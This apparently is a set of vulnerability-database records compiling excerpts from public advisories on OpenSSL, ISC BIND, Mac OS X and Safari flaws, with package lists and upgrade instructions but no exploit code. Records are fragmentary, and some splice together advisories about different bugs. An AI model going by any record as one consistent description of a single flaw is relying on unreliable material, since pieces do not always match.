(CVE-2017-3737) ========================================================== Severity: Moderate OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an "error state" mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. OpenSSL 1.0.2 users should upgrade to 1.0.2n This issue was reported to OpenSSL on 10th November 2017 by David Benjamin (Google). The fix was proposed by David Benjamin and implemented by Matt Caswell of the OpenSSL development team. rsaz_1024_mul_avx2 overflow bug on x86_64 (CVE-2017-3738) ========================================================= Severity: Low There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. Note: The impact from this issue is similar to CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.0 at this time. The fix will be included in OpenSSL 1.1.0h when it becomes available. The fix is also available in commit e502cc86d in the OpenSSL git repository. OpenSSL 1.0.2 users should upgrade to 1.0.2n This issue was reported to OpenSSL on 22nd November 2017 by David Benjamin (Google). The issue was originally found via the OSS-Fuzz project. The fix was developed by Andy Polyakov of the OpenSSL development team. Note ==== Support for version 1.0.1 ended on 31st December 2016. Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates. References ========== URL for this Security Advisory: https://www.openssl.org/news/secadv/20171207.txt Note: the online version of the advisory may be updated with additional details over time. For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
var-201611-0348 named in ISC BIND 9.x before 9.9.9-P4, 9.10.x before 9.10.4-P4, and 9.11.x before 9.11.0-P1 allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a DNAME record in the answer section of a response to a recursive query, related to db.c and resolver.c. ISC BIND Is DNAME There is a problem with the response packet containing the record, db.c Or resolver.c so assertion failture ( Violation of representation ) And the result named May end abnormally. (resolver.c so assertion failure If this happens "INSIST((valoptions & 0x0002U) != 0) failed" , db.c so assertion failure If this happens "REQUIRE(targetp != ((void *)0) && *targetp == ((void *)0)) failed" Is displayed. ) According to the developer, 2016 Year 11 Moon 2 No attacks have been observed as of the day, but queries that cause crashes are mentioned on the public mailing list. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. https://cwe.mitre.org/data/definitions/19.htmlService disruption by a remote third party (DoS) An attack may be carried out. ISC BIND is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the application, resulting in a denial-of-service condition. ISC BIND versions 9.0.x through 9.8.x, 9.9.0 through 9.9.9-P3, 9.9.3-S1 through 9.9.9-S5, 9.10.0 through 9.10.4-P3 and 9.11.0 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: bind security update Advisory ID: RHSA-2016:2871-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2871.html Issue date: 2016-12-06 CVE Names: CVE-2016-8864 ===================================================================== 1. Summary: An update for bind is now available for Red Hat Enterprise Linux 6.2 Advanced Update Support, Red Hat Enterprise Linux 6.4 Advanced Update Support, Red Hat Enterprise Linux 6.5 Advanced Update Support, Red Hat Enterprise Linux 6.5 Telco Extended Update Support, Red Hat Enterprise Linux 6.6 Advanced Update Support, Red Hat Enterprise Linux 6.6 Telco Extended Update Support, and Red Hat Enterprise Linux 6.7 Extended Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux HPC Node EUS (v. 6.7) - x86_64 Red Hat Enterprise Linux HPC Node Optional EUS (v. 6.7) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.2) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.4) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server EUS (v. 6.7) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.4) - x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 6.7) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server TUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server TUS (v. 6.6) - x86_64 3. Description: The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly. Security Fix(es): * A denial of service flaw was found in the way BIND handled responses containing a DNAME answer. (CVE-2016-8864) Red Hat would like to thank ISC for reporting this issue. Upstream acknowledges Tony Finch (University of Cambridge) and Marco Davids (SIDN Labs) as the original reporters. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 After installing the update, the BIND daemon (named) will be restarted automatically. 5. Bugs fixed (https://bugzilla.redhat.com/): 1389652 - CVE-2016-8864 bind: assertion failure while handling responses containing a DNAME answer 6. Package List: Red Hat Enterprise Linux HPC Node EUS (v. 6.7): Source: bind-9.8.2-0.37.rc1.el6_7.9.src.rpm x86_64: bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-utils-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm Red Hat Enterprise Linux HPC Node Optional EUS (v. 6.7): x86_64: bind-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm Red Hat Enterprise Linux Server AUS (v. 6.2): Source: bind-9.7.3-8.P3.el6_2.6.src.rpm x86_64: bind-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-chroot-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-debuginfo-9.7.3-8.P3.el6_2.6.i686.rpm bind-debuginfo-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-libs-9.7.3-8.P3.el6_2.6.i686.rpm bind-libs-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-utils-9.7.3-8.P3.el6_2.6.x86_64.rpm Red Hat Enterprise Linux Server AUS (v. 6.4): Source: bind-9.8.2-0.17.rc1.el6_4.10.src.rpm x86_64: bind-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-chroot-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.10.i686.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-libs-9.8.2-0.17.rc1.el6_4.10.i686.rpm bind-libs-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-utils-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm Red Hat Enterprise Linux Server AUS (v. 6.5): Source: bind-9.8.2-0.23.rc1.el6_5.5.src.rpm x86_64: bind-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-chroot-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-libs-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-libs-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-utils-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm Red Hat Enterprise Linux Server TUS (v. 6.5): Source: bind-9.8.2-0.23.rc1.el6_5.5.src.rpm x86_64: bind-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-chroot-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-libs-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-libs-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-utils-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm Red Hat Enterprise Linux Server AUS (v. 6.6): Source: bind-9.8.2-0.30.rc1.el6_6.7.src.rpm x86_64: bind-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-chroot-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-libs-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-libs-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-utils-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm Red Hat Enterprise Linux Server TUS (v. 6.6): Source: bind-9.8.2-0.30.rc1.el6_6.7.src.rpm x86_64: bind-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-chroot-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-libs-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-libs-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-utils-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm Red Hat Enterprise Linux Server EUS (v. 6.7): Source: bind-9.8.2-0.37.rc1.el6_7.9.src.rpm i386: bind-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-utils-9.8.2-0.37.rc1.el6_7.9.i686.rpm ppc64: bind-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.ppc.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-utils-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm s390x: bind-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.s390.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-utils-9.8.2-0.37.rc1.el6_7.9.s390x.rpm x86_64: bind-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-chroot-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-libs-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-utils-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm Red Hat Enterprise Linux Server Optional AUS (v. 6.2): Source: bind-9.7.3-8.P3.el6_2.6.src.rpm x86_64: bind-debuginfo-9.7.3-8.P3.el6_2.6.i686.rpm bind-debuginfo-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-devel-9.7.3-8.P3.el6_2.6.i686.rpm bind-devel-9.7.3-8.P3.el6_2.6.x86_64.rpm bind-sdb-9.7.3-8.P3.el6_2.6.x86_64.rpm Red Hat Enterprise Linux Server Optional AUS (v. 6.4): Source: bind-9.8.2-0.17.rc1.el6_4.10.src.rpm x86_64: bind-debuginfo-9.8.2-0.17.rc1.el6_4.10.i686.rpm bind-debuginfo-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-devel-9.8.2-0.17.rc1.el6_4.10.i686.rpm bind-devel-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm bind-sdb-9.8.2-0.17.rc1.el6_4.10.x86_64.rpm Red Hat Enterprise Linux Server Optional AUS (v. 6.5): Source: bind-9.8.2-0.23.rc1.el6_5.5.src.rpm x86_64: bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-devel-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-devel-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-sdb-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm Red Hat Enterprise Linux Server Optional TUS (v. 6.5): Source: bind-9.8.2-0.23.rc1.el6_5.5.src.rpm x86_64: bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-debuginfo-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-devel-9.8.2-0.23.rc1.el6_5.5.i686.rpm bind-devel-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm bind-sdb-9.8.2-0.23.rc1.el6_5.5.x86_64.rpm Red Hat Enterprise Linux Server Optional AUS (v. 6.6): x86_64: bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-devel-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-devel-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-sdb-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm Red Hat Enterprise Linux Server Optional TUS (v. 6.6): x86_64: bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-debuginfo-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-devel-9.8.2-0.30.rc1.el6_6.7.i686.rpm bind-devel-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm bind-sdb-9.8.2-0.30.rc1.el6_6.7.x86_64.rpm Red Hat Enterprise Linux Server Optional EUS (v. 6.7): i386: bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.9.i686.rpm ppc64: bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.ppc.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.9.ppc64.rpm s390x: bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.s390.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.s390x.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.9.s390x.rpm x86_64: bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-debuginfo-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.i686.rpm bind-devel-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm bind-sdb-9.8.2-0.37.rc1.el6_7.9.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2016-8864 https://access.redhat.com/security/updates/classification/#important https://kb.isc.org/article/AA-01434 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFYRlsfXlSAg2UNWIIRAmy8AJ9xFyJSMmX2XN+lcWzsNNQT7cfR8QCggVOj KpG5DRbXaKAdrUMg5IeIS+s= =aWJX -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . =========================================================================== Ubuntu Security Notice USN-3119-1 November 01, 2016 bind9 vulnerability =========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 16.10 - Ubuntu 16.04 LTS - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS Summary: Bind could be made to crash if it received specially crafted network traffic. Software Description: - bind9: Internet Domain Name Server Details: Tony Finch and Marco Davids discovered that Bind incorrectly handled certain responses containing a DNAME answer. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 16.10: bind9 1:9.10.3.dfsg.P4-10.1ubuntu1.1 Ubuntu 16.04 LTS: bind9 1:9.10.3.dfsg.P4-8ubuntu1.2 Ubuntu 14.04 LTS: bind9 1:9.9.5.dfsg-3ubuntu0.10 Ubuntu 12.04 LTS: bind9 1:9.8.1.dfsg.P1-4ubuntu0.19 In general, a standard system update will make all the necessary changes. Release Date: 2017-01-27 Last Updated: 2017-01-27 Potential Security Impact: Remote: Denial of Service (DoS) Source: Hewlett Packard Enterprise, Product Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in the HP-UX BIND service running named. These vulnerabilities could be exploited remotely to create multiple Denial of Services (DoS). - HP-UX BIND B.11.31 - BIND 9.9.4 prior to C.9.9.4.9.0 BACKGROUND CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector CVE-2016-8864 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) CVE-2016-9131 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) CVE-2016-9444 7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) Information on CVSS is documented in HPE Customer Notice HPSN-2008-002 here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499 RESOLUTION HPE has provided the following software updates to resolve the vulnerability in the HP-UX BIND service running named. * BIND 9.9.4 for HP-UX Release B.11.31 (PA and IA) * Depot: HP_UX_11.31_HPUX-NameServer_C.9.9.4.9.0_HP-UX_B.11.31_IA_PA.depot Note: The depot files can be found here: <https://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumb r=BIND> MANUAL ACTIONS: Yes - Update Download and install the software update PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HPE and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: <https://h20392.www2.hpe.com/portal/swdepot/displayProductInfo.do?productNumb r=B6834AA> The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.31 IA/PA =================== NameService.BIND-AUX NameService.BIND-RUN action: install C.9.9.4.9.0 or subsequent HISTORY Version:1 (rev.1) - 28 January 2017 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com. Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX Copyright 2016 Hewlett Packard Enterprise Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Workaround ========== There is no known workaround at this time. Resolution ========== All BIND users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-dns/bind-9.10.4_p4" References ========== [ 1 ] CVE-2016-8864 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8864 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201701-26 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . 6) - i386, x86_64 3
var-200611-0472 Apple Mac OS X AppleTalk allows local users to cause a denial of service (kernel panic) by calling the AIOCREGLOCALZN ioctl command with a crafted data structure on an AppleTalk socket. Apple Mac OS X is prone to a local memory-corruption vulnerability. This issue occurs when the operating system fails to handle specially crafted arguments to an IOCTL call. Due to the nature of this issue, an attacker may be able to execute arbitrary machine code in the context of the affected kernel, but this has not been confirmed. Failed exploit attempts result in kernel panics, denying service to legitimate users. Mac OS X version 10.4.8 is vulnerable to this issue; other versions may also be affected. ---------------------------------------------------------------------- To improve our services to our customers, we have made a number of additions to the Secunia Advisories and have started translating the advisories to German. The improvements will help our customers to get a better understanding of how we reached our conclusions, how it was rated, our thoughts on exploitation, attack vectors, and scenarios. This includes: * Reason for rating * Extended description * Extended solution * Exploit code or links to exploit code * Deep links Read the full description: http://corporate.secunia.com/products/48/?r=l Contact Secunia Sales for more information: http://corporate.secunia.com/how_to_buy/15/?r=l ---------------------------------------------------------------------- TITLE: Mac OS X Mach-O Universal Binary Memory Corruption SECUNIA ADVISORY ID: SA23088 VERIFY ADVISORY: http://secunia.com/advisories/23088/ CRITICAL: Less critical IMPACT: DoS, System access WHERE: Local system OPERATING SYSTEM: Apple Macintosh OS X http://secunia.com/product/96/ DESCRIPTION: LMH has reported a vulnerability in Mac OS X, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or potentially gain escalated privileges. The vulnerability is caused due to an error in the fatfile_getarch2() function. This can be exploited to cause an integer overflow and may potentially allow execution of arbitrary code with kernel privileges via a specially crafted Mach-O Universal binary. Other versions may also be affected. SOLUTION: Grant only trusted users access to affected systems. PROVIDED AND/OR DISCOVERED BY: LMH ORIGINAL ADVISORY: http://projects.info-pull.com/mokb/MOKB-26-11-2006.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
var-200603-0276 Safari in Mac OS X 10.3 before 10.3.9 and 10.4 before 10.4.5 allows remote attackers to redirect users to local files and execute arbitrary JavaScript via unspecified vectors involving HTTP redirection to local resources. Apple has released Security Update 2006-001 to address multiple remote and local Mac OS X vulnerabilities. Apple has also released updates to address these issues. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-053A Apple Mac OS X Safari Command Execution Vulnerability Original release date: February 22, 2006 Last revised: -- Source: US-CERT Systems Affected Apple Safari running on Mac OS X Overview A file type determination vulnerability in Apple Safari could allow a remote attacker to execute arbitrary commands on a vulnerable system. I. Details are available in the following Vulnerability Note: VU#999708 - Apple Safari may automatically execute arbitrary shell commands II. Impact A remote, unauthenticated attacker could execute arbitrary commands with the privileges of the user running Safari. If the user is logged on with administrative privileges, the attacker could take complete control of an affected system. III. Solution Since there is no known patch for this issue at this time, US-CERT is recommending a workaround. References * US-CERT Vulnerability Note VU#999708 - <http://www.kb.cert.org/vuls/id/999708> * Securing Your Web Browser - <http://www.us-cert.gov/reading_room/securing_browser/#sgeneral> * Apple - Mac OS X - Safari RSS - <http://www.apple.com/macosx/features/safari/> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA06-053A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA06-053A Feedback VU#999708" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History Feb 22, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ/zKN30pj593lg50AQJgoQf/ZajorZz/6quzA40dc8cLxIBT70xcClH5 CKDN5nMXl1mRYYkDPF07GbcWL3lWarW5Hif0OiZfazaGNC3p9v4ZxDx/dW/ZmsYo eDznsNWNphKB6yBSIbOUSfGyh/I7pQlG3qxXRWDTA9nVK12KIkvAAoPTgBe40obu +x58gK5/ib4d+dEZ8F9SbO7/syYtcAzfzS2HrBYhG1lWWLYTaNC3hyI2nXF5lNV/ ymwaPv0ivAB9rpalus+KkajjiV5+J08dj+1JwgwcSpvuNMQ5c/8RCIILP+1bR+CL lScvGuSRYk4S0QI9nmCDvwD52sluiwp2VO1atTQ1zcgpwhvLRGo3DQ== =P2/3 -----END PGP SIGNATURE----- . Details of the fixes are available via the PHP web site (www.php.net). PHP ships with Mac OS X but is disabled by default. automount CVE-ID: CVE-2006-0384 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.5, Mac OS X Server v10.4.5 Impact: Malicious network servers may cause a denial of service or arbitrary code execution Description: File servers on the local network may be able to cause Mac OS X systems to mount file systems with reserved names. This could cause the systems to become unresponsive, or possibly allow arbitrary code delivered from the file servers to run on the target system. BOM CVE-ID: CVE-2006-0391 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.5, Mac OS X Server v10.4.5 Impact: Directory traversal may occur while unpacking archives with BOM Description: The BOM framework handles the unpacking of certain types of archives. This framework is vulnerable to a directory traversal attack that can allow archived files to be unpacked into arbitrary locations that are writable by the current user. This update addresses the issue by properly sanitizing those paths. Credit to Stephane Kardas of CERTA for reporting this issue. Directory Services CVE-ID: CVE-2005-2713, CVE-2005-2714 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.5, Mac OS X Server v10.4.5 Impact: Malicious local users may create and manipulate files as root Description: The passwd program is vulnerable to temporary file attacks. This could lead to privilege elevation. This update addresses the issue by anticipating a hostile environment and by creating temporary files securely. Credit to Ilja van Sprundel of Suresec LTD, vade79, and iDefense (idefense.com) for reporting this issue. FileVault CVE-ID: CVE-2006-0386 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.5, Mac OS X Server v10.4.5 Impact: FileVault may permit access to files during when it is first enabled Description: User directories are mounted in an unsafe fashion when a FileVault image is created. This update secures the method in which a FileVault image is created. This update addresses the issues by correctly handling the conditions that may cause crashes. Credit to OUSPG from the University of Oulu, NISCC, and CERT-FI for coordinating and reporting this issue. LibSystem CVE-ID: CVE-2005-3706 Available for: Mac OS X v10.4.5, Mac OS X Server v10.4.5 Impact: Attackers may cause crashes or arbitrary code execution depending upon the application Description: An attacker able to cause an application to make requests for large amounts of memory may also be able to trigger a heap buffer overflow. This could cause the targeted application to crash or execute arbitrary code. This update addresses the issue by correctly handling these memory requests. This issue does not affect systems prior to Mac OS X v10.4. Credit to Neil Archibald of Suresec LTD for reporting this issue. Mail CVE-ID: CVE-2006-0395 Available for: Mac OS X v10.4.5, Mac OS X Server v10.4.5 Impact: Download Validation fails to warn about unsafe file types Description: In Mac OS X v10.4 